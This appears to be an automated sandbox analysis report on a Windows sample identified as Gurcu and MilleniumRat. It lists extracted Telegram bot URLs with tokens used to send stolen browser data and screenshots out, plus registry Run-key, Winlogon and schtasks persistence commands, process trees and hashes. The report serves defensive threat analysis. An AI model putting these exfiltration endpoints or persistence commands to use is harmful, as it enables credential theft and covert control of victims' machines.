Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2024 11:20
Static task
static1
Behavioral task
behavioral1
Sample
main.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
main.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
main.exe
Resource
win11-20241007-en
General
-
Target
main.exe
-
Size
5.6MB
-
MD5
3d3c49dd5d13a242b436e0a065cd6837
-
SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b
-
SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
-
SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
-
SSDEEP
98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getFile?file_id=BQACAgEAAyEFAASF2AHzAALou2cwl07NEAWjTDlMCHZNC4xH-SlrAAJrBAAC1teJRewejQPrUFzmNg
https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590
https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\", \"C:\\Users\\All Users\\ChainComServermonitor.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\", \"C:\\Users\\All Users\\ChainComServermonitor.exe\", \"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\", \"C:\\Users\\All Users\\ChainComServermonitor.exe\", \"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\", \"C:\\Users\\Default User\\StartMenuExperienceHost.exe\"" ChainComServermonitor.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4340 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1668 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4592 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2240 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4332 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1972 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 720 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2704 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3492 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2872 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1976 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2264 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2884 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4876 3008 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4064 3008 schtasks.exe 89 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation main.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation svchost64.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation ChainComServermonitor.exe -
Executes dropped EXE 4 IoCs
pid Process 1132 Update.exe 4872 svchost64.exe 112 ChainComServermonitor.exe 2272 WmiPrvSE.exe -
Loads dropped DLL 2 IoCs
pid Process 5024 main.exe 1132 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Default User\\StartMenuExperienceHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Default User\\WmiPrvSE.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChainComServermonitor = "\"C:\\Users\\All Users\\ChainComServermonitor.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChainComServermonitor = "\"C:\\Users\\All Users\\ChainComServermonitor.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Default User\\StartMenuExperienceHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Default User\\WmiPrvSE.exe\"" ChainComServermonitor.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 12 raw.githubusercontent.com 14 raw.githubusercontent.com 21 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSCC6E35351371843E4BA329C19D175557C.TMP csc.exe File created \??\c:\Windows\System32\lhkpi-.exe csc.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4508 tasklist.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe ChainComServermonitor.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe ChainComServermonitor.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\e6c9b481da804f ChainComServermonitor.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4744 PING.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3308 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings svchost64.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings ChainComServermonitor.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4588 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4744 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1668 schtasks.exe 2240 schtasks.exe 4876 schtasks.exe 4340 schtasks.exe 4332 schtasks.exe 2704 schtasks.exe 1972 schtasks.exe 2264 schtasks.exe 2872 schtasks.exe 1976 schtasks.exe 2884 schtasks.exe 4064 schtasks.exe 4592 schtasks.exe 720 schtasks.exe 3492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 5024 main.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe 1132 Update.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 5024 main.exe Token: SeDebugPrivilege 4508 tasklist.exe Token: SeDebugPrivilege 1132 Update.exe Token: SeDebugPrivilege 112 ChainComServermonitor.exe Token: SeDebugPrivilege 2272 WmiPrvSE.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1132 Update.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 5024 wrote to memory of 4532 5024 main.exe 90 PID 5024 wrote to memory of 4532 5024 main.exe 90 PID 4532 wrote to memory of 4508 4532 cmd.exe 92 PID 4532 wrote to memory of 4508 4532 cmd.exe 92 PID 4532 wrote to memory of 4904 4532 cmd.exe 93 PID 4532 wrote to memory of 4904 4532 cmd.exe 93 PID 4532 wrote to memory of 3308 4532 cmd.exe 94 PID 4532 wrote to memory of 3308 4532 cmd.exe 94 PID 4532 wrote to memory of 1132 4532 cmd.exe 95 PID 4532 wrote to memory of 1132 4532 cmd.exe 95 PID 1132 wrote to memory of 748 1132 Update.exe 99 PID 1132 wrote to memory of 748 1132 Update.exe 99 PID 748 wrote to memory of 4588 748 cmd.exe 101 PID 748 wrote to memory of 4588 748 cmd.exe 101 PID 1132 wrote to memory of 4872 1132 Update.exe 104 PID 1132 wrote to memory of 4872 1132 Update.exe 104 PID 1132 wrote to memory of 4872 1132 Update.exe 104 PID 4872 wrote to memory of 2112 4872 svchost64.exe 105 PID 4872 wrote to memory of 2112 4872 svchost64.exe 105 PID 4872 wrote to memory of 2112 4872 svchost64.exe 105 PID 2112 wrote to memory of 2792 2112 WScript.exe 106 PID 2112 wrote to memory of 2792 2112 WScript.exe 106 PID 2112 wrote to memory of 2792 2112 WScript.exe 106 PID 2792 wrote to memory of 112 2792 cmd.exe 108 PID 2792 wrote to memory of 112 2792 cmd.exe 108 PID 112 wrote to memory of 920 112 ChainComServermonitor.exe 112 PID 112 wrote to memory of 920 112 ChainComServermonitor.exe 112 PID 920 wrote to memory of 4668 920 csc.exe 114 PID 920 wrote to memory of 4668 920 csc.exe 114 PID 112 wrote to memory of 208 112 ChainComServermonitor.exe 115 PID 112 wrote to memory of 208 112 ChainComServermonitor.exe 115 PID 208 wrote to memory of 3580 208 csc.exe 117 PID 208 wrote to memory of 3580 208 csc.exe 117 PID 112 wrote to memory of 3708 112 ChainComServermonitor.exe 130 PID 112 wrote to memory of 3708 112 ChainComServermonitor.exe 130 PID 3708 wrote to memory of 4364 3708 cmd.exe 132 PID 3708 wrote to memory of 4364 3708 cmd.exe 132 PID 3708 wrote to memory of 4744 3708 cmd.exe 133 PID 3708 wrote to memory of 4744 3708 cmd.exe 133 PID 3708 wrote to memory of 2272 3708 cmd.exe 134 PID 3708 wrote to memory of 2272 3708 cmd.exe 134 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9CAD.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9CAD.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 5024"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:4904
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:3308
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:4588
-
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3andil0x\3andil0x.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4C2.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSC68367FA5CB754BA4808BA555E24575FB.TMP"9⤵PID:4668
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lwxvmawv\lwxvmawv.cmdline"8⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC54F.tmp" "c:\Windows\System32\CSCC6E35351371843E4BA329C19D175557C.TMP"9⤵PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K6ODNwx9aX.bat"8⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\chcp.comchcp 650019⤵PID:4364
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4744
-
-
C:\Users\Default User\WmiPrvSE.exe"C:\Users\Default User\WmiPrvSE.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ChainComServermonitorC" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\ChainComServermonitor.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ChainComServermonitor" /sc ONLOGON /tr "'C:\Users\All Users\ChainComServermonitor.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ChainComServermonitorC" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ChainComServermonitor.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Start Menu\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4064
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Process Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
162B
MD5049f2be47735fc7099ee6e76ca0e0408
SHA1d0cacbdf92d1a908f29c6de0804a84946cdc97dc
SHA256239e2d560f1a97d06fdc83450411bca5d3dcb0b8f388302263dce9dd2aa1d6f9
SHA512c15e5bf3f54a618e68ec29b0906b51d7d9792f7e8726969a0a526faa7e4d939350849285179890bc7dbe50b436d8d27ff2cc3470fdf45080eb0f9441016b0375
-
Filesize
1KB
MD5696be55fbd03529545243da2fd5c0f6c
SHA17cda13d4d40ae281d9f5dde65e94a82e8fd3dc6b
SHA25624bb0d76e40abeec2eba8962345785759b0995ed1142f21b73f89c4651b063a1
SHA512dcf63b9b2b7ac993bb946d9fb1cd82d756f2e2b7894d8b23064471240afe6ebf18fb3d4c0cdfd4826849df66eaeb0eaef57f15e1502a533442c474770de5fd27
-
Filesize
1KB
MD5ae78f8a0a143171e7f34d9a8159c3b51
SHA1224eaa9596a293a10edbebb579c652eaf9cb5bd3
SHA256d745952b773351ac2a41d387fb7ecda75c012e1efb15e5a31fee9884a4c77133
SHA51271895b40c3ba935babd3bccfa0e9d9ec45a982b31e1de4f719f9d4853ccb75f64f21dfa9c4c9fab43e0481614e89f8697e7bdb396fdc33c80e7b3cf5fff08f7c
-
Filesize
3.5MB
MD55fe249bbcc644c6f155d86e8b3cc1e12
SHA1f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d
SHA2569308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80
SHA512b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39
-
Filesize
103B
MD577218ae27e9ad896918d9a081c61b1be
SHA13c8ebaa8fa858b82e513ccf482e11172b0f52ce0
SHA256e09540a47f3647a9fdf9673281e2664441bbaee8d3236d22b1875b9d23abacab
SHA5126a16b367a762132172830fd81c41c58ac49de788eed93d4c5526f8f0e6859703b336a137fd8d4fe7088b4110d72e5f4767b6462bc4651769924b67305719f30a
-
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe
Filesize217B
MD5d6da6166258e23c9170ee2a4ff73c725
SHA1c3c9d6925553e266fe6f20387feee665ce3e4ba9
